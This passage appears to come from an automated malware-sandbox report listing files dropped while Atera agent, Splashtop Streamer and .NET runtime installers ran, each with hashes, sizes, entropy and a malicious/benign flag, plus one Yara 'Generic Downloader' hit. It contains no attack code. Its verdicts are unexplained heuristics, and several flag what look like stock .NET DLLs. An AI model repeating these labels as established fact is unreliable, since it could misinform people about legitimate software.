                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:ZZdZVbcj9cSuINr2JeOayeFbpo7iE8o3c:LdZVbe9dNVOay8be7iTo3c
                                                                                                                                                                                                                                                                                                                                  MD5:04520F980CDAE284E8E277A5EEEEDDE0
                                                                                                                                                                                                                                                                                                                                  SHA1:553717161DB99170BF43A552F5ADE7D62D595C88
                                                                                                                                                                                                                                                                                                                                  SHA-256:0D2BAD6FB84641FB0C314A885A43659733A2FFE4FD30038D686D8943215085CD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B6931CA1FB8E15E3EADA725477786CEFF1A5AC92A2BB6E6350BF826EB416E5E1CE1BB5F545C926EE86AC21B25F8B7569486F9A92E0BD237088482A9A5AE948A2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):58664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.651805521522887
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:v8zO+8uP8x/A15A4HI4gJl01Qa7ICltVtYFClobY9zJQ+M:kzO+8uA/A15A4o4gJq1DI+tEi4QzmH
                                                                                                                                                                                                                                                                                                                                  MD5:FBB5BF650AAEA448D918B2CEFE709039
                                                                                                                                                                                                                                                                                                                                  SHA1:D9A7B45DD8F22D24089DE96559D3BAC4D431FA47
                                                                                                                                                                                                                                                                                                                                  SHA-256:060AEFDEBF10E01A664A63C4330137DA0C0CC9F01A82E1FB09981E0369A7D365
                                                                                                                                                                                                                                                                                                                                  SHA-512:F34556DBA9EA69FCE8BC2D0EB95AB16048EEC1603F7CC9107F4ADE445A0694FE35DF120D21A42DA44B2516839191912E29CDA88685E67F5E2AD02DC9CE98128D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147120
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8679598076564816
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:ZtgZms10iHvh7x8SKJlZ4vCCk7nw55IvZ4MgSZctpoEXXRWfzy:ZtgZ/aSKlZ4ZGnwmUS4ScRg2
                                                                                                                                                                                                                                                                                                                                  MD5:354AF4403A04CA4CAF359981635D08D4
                                                                                                                                                                                                                                                                                                                                  SHA1:A447720776EE112E45E08CFF574123A54ABD4A08
                                                                                                                                                                                                                                                                                                                                  SHA-256:15B115DEC61C47C0C10C49E98513EA8E4C83A9E2FC1F562F30FDB2CC1F620643
                                                                                                                                                                                                                                                                                                                                  SHA-512:BAABAB57981A6E7476FD9716FDB34585A5AA443067E2BFAADB0A79F2F7AAFFA31DEAD4B5559E43327EA0E3AE4A89CF131245C6C5852334906D0CC465E51F2230
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):517032
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.327188439808119
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:DD4t2kjj3Ueh/9WoJcDSdiA9HuUrUb9KcvYCxe3Rw42SISaVGxQJyRMq1KsLGjrT:DDrkjjUoJcDSdiw4QcO3RoS9MV
                                                                                                                                                                                                                                                                                                                                  MD5:B5D0F85E7C820DB76EF2F4535552F03C
                                                                                                                                                                                                                                                                                                                                  SHA1:91EFF42F542175A41549BC966E9B249B65743951
                                                                                                                                                                                                                                                                                                                                  SHA-256:3D6D6E7A6F4729A7A416165BEABDA8A281AFFF082EBB538DF29E8F03E1A4741C
                                                                                                                                                                                                                                                                                                                                  SHA-512:5246EBEAF84A0486FF5ADB2083F60465FC68393D50AF05D17F704D08229CE948860018CBE880C40D5700154C3E61FC735C451044F85E03D78568D60DE80752F7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):101640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.506576792775679
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:XiTrnaN0HjO8MZYq5V4bgDHsPdPpwSJ5L3Akcg9Qjei+azJ:maN8qZYe4bgDUnNKjeu1
                                                                                                                                                                                                                                                                                                                                  MD5:24DE069D45146E3C9C58241640EBC228
                                                                                                                                                                                                                                                                                                                                  SHA1:7ADA4AFFD7F72B83888B9A2E6B6A3CA9F6A8498A
                                                                                                                                                                                                                                                                                                                                  SHA-256:3B9D2E148DA3B035B12DC0787F8C5B23EC502B2428F6593A1B5C65BF527A3D5C
                                                                                                                                                                                                                                                                                                                                  SHA-512:6136C2954C59BBC0B26CD8E99AA3A2523A62F9AC90F415F3E74206D638762BF5E46E8B9DD72FD30F50CFC1997F2F8BD9D09BA160ADE9B6D008BADA6B46CEFE3E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1122768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6466118295886165
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:CJG2BrB3ZQAq0AT2jS9HKHdK6AccMs1wmxvSZX0ypFi:0VGrT6SAk3ei
                                                                                                                                                                                                                                                                                                                                  MD5:3B337C2D41069B0A1E43E30F891C3813
                                                                                                                                                                                                                                                                                                                                  SHA1:EBEE2827B5CB153CBBB51C9718DA1549FA80FC5C
                                                                                                                                                                                                                                                                                                                                  SHA-256:C04DAEBA7E7C4B711D33993AB4C51A2E087F98F4211AEA0DCB3A216656BA0AB7
                                                                                                                                                                                                                                                                                                                                  SHA-512:FDB3012A71221447B35757ED2BDCA6ED1F8833B2F81D03AABEBD2CD7780A33A9C3D816535D03C5C3EDD5AAF11D91156842B380E2A63135E3C7F87193AD211499
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Sep 13 19:26:18 2024, mtime=Wed Oct 30 21:31:04 2024, atime=Fri Sep 13 19:26:18 2024, length=4641288, window=hide
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2267
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.541071343610311
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:8os+EJdOEvbw2K3qnA5ffdQ4dGdQcQTUUsuyfm:8DxJdOG1U7JfdtdGdlx/
                                                                                                                                                                                                                                                                                                                                  MD5:A63ED920ECCFD76967B690A32C48C4F9
                                                                                                                                                                                                                                                                                                                                  SHA1:DFFBE98063E1E60DE4967991AB5A5CDCFED2922E
                                                                                                                                                                                                                                                                                                                                  SHA-256:3D3581DC0F8A572F94436D92F89FF6B6018CDD25717650829C1D3A703E04E843
                                                                                                                                                                                                                                                                                                                                  SHA-512:CBD7195229E34FC52074ACECD3C55D30AE73166FDFF9994430B10AB900C5AE5D1B73C4A458D092BAAEB4540949E0EF0898F71700AAAC05FDCAAAE8C1C08FDFCD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Preview:Windows shortcut (binary data); target path: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2402
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.362731083469072
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:MxHKQg8mHDp684IHTQ06YHKGSI6oPtHTHhAHKKk+HKlT4v1qHGIs0HKaHKmTHlH7:iqzCIzQ06YqGSI6oPtzHeqKk+qZ4vwme
                                                                                                                                                                                                                                                                                                                                  MD5:28B4BFE9130A35038BD57B2F89847BAE
                                                                                                                                                                                                                                                                                                                                  SHA1:8DBF9D2800AB08CCA18B4BA00549513282B774A9
                                                                                                                                                                                                                                                                                                                                  SHA-256:19F498CAE589207075B8C82D7DACEAE23997D61B93A971A4F049DC14C8A3D514
                                                                                                                                                                                                                                                                                                                                  SHA-512:02100FD4059C4D32FBAAA9CEAACB14C50A4359E4217203B2F7A40E298AD819ED5469F2442291F12852527A2B7109CC5F7BFF7FDAD53BA5ABF75FC5F0474E984F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\434f871c532673e1359654ad68a1c225\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\a
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):651
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                                                                                                                  MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                                                                                                                  SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                                                                                                                  SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2994176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.878685496531656
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:h+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:h+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                                                                  MD5:2BA70A300E16D1B51BD103DE907777D8
                                                                                                                                                                                                                                                                                                                                  SHA1:9774343AEB3B6F06593FC84A59422EF3B8CCE66B
                                                                                                                                                                                                                                                                                                                                  SHA-256:0D47740BF97710835EBE91AC545FF0DA45D81B54DFB8E2DEA485FE5A123AE468
                                                                                                                                                                                                                                                                                                                                  SHA-512:A2BA8694EA4D014E4103ED02D11BA7309D0CE0F290F55F0D671710CDF61F6D06D976531469686325965966A2D9CD5A0B3A69F47CA5B351B40DA03FFAF15D47BB
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 936, Title: Installation Database, Subject: Splashtop Streamer, Author: Splashtop Inc., Keywords: Installer,MSI,Database, Comments: Splashtop Streamer Installer, Create Time/Date: Fri Sep 13 17:31:18 2024, Name of Creating Application: InstallShield?2021 27, Security: 1, Template: Intel;0,1033,2052,1028,1036,1031,1040,1041,1042,1046,1049,1034, Last Saved By: Intel;2052, Revision Number: {B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.0;{B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.0;{001F085C-058A-480B-AD56-2940B857C38D}, Number of Pages: 200, Number of Characters: 1
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53136896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.963270308775673
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:786432:kB4DOC/YOGmsS/FcbNbDm87ViwLTCg2m+5iYeVhV4ASHQy6UUZwNSG3bZ:VDO0GVUINbD5gwLz2mu2/3YZh3bZ
                                                                                                                                                                                                                                                                                                                                  MD5:ACF51C28B5EF5F78EE2A1F6800EDF813
                                                                                                                                                                                                                                                                                                                                  SHA1:CD52386AE838919C9D2813FF6179D7EC94B45B92
                                                                                                                                                                                                                                                                                                                                  SHA-256:82D4B1E2F38A8955F870232706CCE5193CD044F37C5414FED128F5DA846957B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:C9200CEEC6F81A63DE63CD1038BC3B18D98B83B8DC738A2D02A7FF295F79312A57A60D4EFE904ACC2696C4E157D722C09ECF943AF0C1257EAFA6B8D9C3655852
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Runtime - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Runtime - 6.0.35 (x64)., Template: x64;1033, Revision Number: {76657AF8-AF4E-4FA9-9A39-80AC267D9B11}, Create Time/Date: Fri Sep 20 22:46:46 2024, Last Saved Time/Date: Fri Sep 20 22:46:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27254784
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.993818546625114
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:393216:S9tkUbkbvqusHBmlh8dvMt0NDf8K/36n8lxjNnLBKopkJUjy/AlhxH169Dqnw+Oz:24qu1lMDf8Kyn83jNltkJ7JGnTOaTm
                                                                                                                                                                                                                                                                                                                                  MD5:D9F7AE6A57AF83B652711426C4834045
                                                                                                                                                                                                                                                                                                                                  SHA1:98D255AECDBFD1BAE9FF533D4C7E5DBE5D0E1833
                                                                                                                                                                                                                                                                                                                                  SHA-256:AF1319821632F2CEB79C61B4CA6EB53A6341FBA295C02716418216857AF7F4E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C7DB8C0617125DEB27DE37B056FEEAEAF18585A12AD347A6E6C132AE438E1EB0F27180BC700BD8322E5D5A30E7CEFA62B123E7B0B9CD85E1B8605C0B195BE03
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Runtime - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Runtime - 6.0.35 (x64)., Template: x64;1033, Revision Number: {76657AF8-AF4E-4FA9-9A39-80AC267D9B11}, Create Time/Date: Fri Sep 20 22:46:46 2024, Last Saved Time/Date: Fri Sep 20 22:46:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27254784
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.993818546625114
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:393216:S9tkUbkbvqusHBmlh8dvMt0NDf8K/36n8lxjNnLBKopkJUjy/AlhxH169Dqnw+Oz:24qu1lMDf8Kyn83jNltkJ7JGnTOaTm
                                                                                                                                                                                                                                                                                                                                  MD5:D9F7AE6A57AF83B652711426C4834045
                                                                                                                                                                                                                                                                                                                                  SHA1:98D255AECDBFD1BAE9FF533D4C7E5DBE5D0E1833
                                                                                                                                                                                                                                                                                                                                  SHA-256:AF1319821632F2CEB79C61B4CA6EB53A6341FBA295C02716418216857AF7F4E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C7DB8C0617125DEB27DE37B056FEEAEAF18585A12AD347A6E6C132AE438E1EB0F27180BC700BD8322E5D5A30E7CEFA62B123E7B0B9CD85E1B8605C0B195BE03
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host FX Resolver - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host FX Resolver - 6.0.35 (x64)., Template: x64;1033, Revision Number: {4E46258D-E612-40D6-A98B-8F64771E3561}, Create Time/Date: Fri Sep 20 22:45:38 2024, Last Saved Time/Date: Fri Sep 20 22:45:38 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):876544
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.764930942879866
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:2F1vYgTqU8VKIvZUlkj/cBhZeK4lu/XdmYw:Q/THWvZgkjcDefMFm
                                                                                                                                                                                                                                                                                                                                  MD5:D8BEAFDEDBD946A6A8FC665AF000ED79
                                                                                                                                                                                                                                                                                                                                  SHA1:2BFE61EADB6172CB71CEA0155A7304630B28B13E
                                                                                                                                                                                                                                                                                                                                  SHA-256:671E5EF4766CAC4AA479E7445F52892D1807F63269BDA8159A584C540FB56706
                                                                                                                                                                                                                                                                                                                                  SHA-512:2774D5A5158BCE463819DBC2DDC065DA502A1C6C75A800A815BEEB028C95000263F42B6E6012FC979A3A5AC51B9027B231685739F7A0D7043178762B1602A9B0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host - 6.0.35 (x64)., Template: x64;1033, Revision Number: {C44636B0-CF91-423F-8EBB-E5C6C9CC18A4}, Create Time/Date: Fri Sep 20 22:45:28 2024, Last Saved Time/Date: Fri Sep 20 22:45:28 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):811008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.575095120429218
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:4gJcuBRFvqU8VKIvZUlkj/cBhZeK4lu/XdmYwh:46zBRlHWvZgkjcDefMFm
                                                                                                                                                                                                                                                                                                                                  MD5:C06D2181660306AE33B8D5E37DD4E98D
                                                                                                                                                                                                                                                                                                                                  SHA1:2B7F6A21BDB9E2414C3B13AA357C395512A86499
                                                                                                                                                                                                                                                                                                                                  SHA-256:D09C105D0C6E5D89D4E53499288135FF53AAAC76EE1E11470EC1AE49CC4A485E
                                                                                                                                                                                                                                                                                                                                  SHA-512:96205082A1C94370D7D4DA90C319A0D0E3AF8FB53B2A33097C86A0D8EC14963745A940E38FB31B68394847AA80467E41CA1B5F83685F25B779521676DBA1EA4C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host - 6.0.35 (x64)., Template: x64;1033, Revision Number: {C44636B0-CF91-423F-8EBB-E5C6C9CC18A4}, Create Time/Date: Fri Sep 20 22:45:28 2024, Last Saved Time/Date: Fri Sep 20 22:45:28 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):811008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.575095120429218
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:4gJcuBRFvqU8VKIvZUlkj/cBhZeK4lu/XdmYwh:46zBRlHWvZgkjcDefMFm
                                                                                                                                                                                                                                                                                                                                  MD5:C06D2181660306AE33B8D5E37DD4E98D
                                                                                                                                                                                                                                                                                                                                  SHA1:2B7F6A21BDB9E2414C3B13AA357C395512A86499
                                                                                                                                                                                                                                                                                                                                  SHA-256:D09C105D0C6E5D89D4E53499288135FF53AAAC76EE1E11470EC1AE49CC4A485E
                                                                                                                                                                                                                                                                                                                                  SHA-512:96205082A1C94370D7D4DA90C319A0D0E3AF8FB53B2A33097C86A0D8EC14963745A940E38FB31B68394847AA80467E41CA1B5F83685F25B779521676DBA1EA4C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4718641
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.577367326443097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:k3H5BNwueVRfshljU+cCD+EA2IvtynSyeGPCXtoa3yRHbXLjtQ:k3H5BNMshFUi+sng/oaO7y
                                                                                                                                                                                                                                                                                                                                  MD5:25A0AA722268B17888B4E159A9F82F18
                                                                                                                                                                                                                                                                                                                                  SHA1:68CCB5ADAE9095056A9D5592F6A850F30715A86B
                                                                                                                                                                                                                                                                                                                                  SHA-256:72896D8ABEEEB40360596927C0FEADE8F0BC28F9937D35F646B9BA2A47F1EDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:79A574F95DBB5FF11E35F2938FCD6A9E22A3F1A35D7E032ACEB099DD69AD45DCDF006D92AEB7D1086E3D0615241F6669E510D5DEE6F7D262E0E3D4179822365D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):182768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.29474871459677
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:M3hCcV2YVWR8xSSIqeCjEIz+hZvgvE5Q+yq8MPdJ0xH:ErTz9Pj/Ag/+XPw
                                                                                                                                                                                                                                                                                                                                  MD5:9ED1749276D20BE78D5E7A30D658C484
                                                                                                                                                                                                                                                                                                                                  SHA1:EAAEA2656A63366A888955CE030E091FEA70F0F6
                                                                                                                                                                                                                                                                                                                                  SHA-256:61F398C652504FEE07AF12AC50D4A70ECFF641234A4EDA59C68EC937B6D80C96
